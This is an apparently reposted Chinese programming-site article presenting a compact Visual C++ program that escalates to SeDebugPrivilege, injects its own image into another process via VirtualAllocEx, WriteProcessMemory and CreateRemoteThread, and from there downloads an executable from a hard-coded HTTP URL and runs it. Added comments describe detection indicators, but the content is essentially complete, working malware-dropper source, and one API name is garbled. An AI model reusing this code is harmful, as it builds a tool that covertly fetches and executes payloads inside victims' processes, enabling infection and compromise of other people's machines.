
VC++1.5K字节实现下载并远程注入
2014-11-23 19:26:28 】 浏览:9771
Tags:1.5K 字节 实现 下载 远程 注入

[cpp]
#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "urlmon.lib")
#include < windows.h>

// Thread routine: fetches an executable from a hard-coded HTTP URL, saves it
// to the root of C:, launches it, and then ends the calling thread.
// InjectPro() passes this function's address to CreateRemoteThread, so it is
// meant to run inside another process rather than in the original one.
//
// Review notes (defensive):
//  - The download uses plain HTTP and the file is executed without any
//    signature or hash check; none of the return values are inspected.
//  - Observable behaviour: a urlmon download by a process that does not
//    normally fetch files, a new .exe written directly under C:\, and a
//    child process started from that path by the host process.
void InjectMemo()

{
// Download the remote file to a fixed local path (result ignored).
URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);
// Run the downloaded file with a visible window (result ignored).
WinExec("c:/upiea.exe", SW_SHOW);
// End only this thread; the process hosting it keeps running.
ExitThread(0);
}

// Tries to enable SeDebugPrivilege in the current process token.
// Takes no arguments and returns nothing; a failure at any step is silent.
//
// Review notes (defensive):
//  - No return value is checked here, and AdjustTokenPrivileges can report
//    success even when the privilege was not actually granted, so the caller
//    cannot tell whether the privilege is held afterwards.
//  - hToken is never closed in this function.
//  - SeDebugPrivilege is normally only present in administrator tokens.
//    Restricting who holds it and auditing token-right adjustments are the
//    relevant controls for this step.
void GetDebugPrivs()
{
HANDLE hToken;
DWORD ReGvl;
TOKEN_PRIVILEGES Ttges;

// Open our own token with the rights needed to query and adjust privileges.
if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
// Resolve the LUID for the "SeDebugPrivilege" name into the request structure.
LookupPrivilegeva lue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);
Ttges.PrivilegeCount=1;
Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Apply the single-privilege request; no previous state is asked for.
AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);
}
}

// Program entry point (named by /ENTRY:InjectPro in the linker pragma).
// Copies this program's whole in-memory image into another process at the
// same virtual address and starts a thread there at InjectMemo.
//
// Because the image is written to the address it occupies locally, and
// InjectMemo's local address is used as the remote start address, the scheme
// depends on the fixed /BASE set in the linker pragma. That pragma also marks
// .text as executable, writable and readable.
//
// Review notes (defensive):
//  - The call sequence OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx with
//    PAGE_EXECUTE_READWRITE -> WriteProcessMemory -> CreateRemoteThread is a
//    well-known cross-process injection pattern. Endpoint tooling commonly
//    alerts on it, for example through Sysmon ProcessAccess and
//    CreateRemoteThread events.
//  - The target is whichever process owns the first window of class "#32770"
//    (the standard dialog class), so the affected process varies by machine.
//  - No return value is checked. If no such window exists, PID is used
//    uninitialized. ProcessHandle is never closed.
//  - Static indicators in the binary: the fixed image base, the merged
//    write+execute .text section, and the hard-coded URL and file path.
void InjectPro()
{
DWORD Size,PID;
PBYTE module;
// Base address of this executable's own image in memory.
module = (PBYTE)GetModuleHandle(0);
// Walk DOS header -> NT headers to read the image size from the optional header.
Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
HANDLE ProcessHandle;
LPVOID heart;
GetDebugPrivs();
// Pick the process that owns the first top-level dialog-class window found.
GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
// Attempt to release whatever region in the target begins at our base address.
VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
// Request an RWX region in the target at that same address, sized to the image.
heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Copy this process's entire loaded image into the target region.
WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);
// Start a thread in the target at InjectMemo's address; `module` is its argument.
CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);
}
作者:yincheng01

VC++1.5K字节实现下载并远程注入 https://www.cppentry.com/bencandy.php?fid=55&id=15520
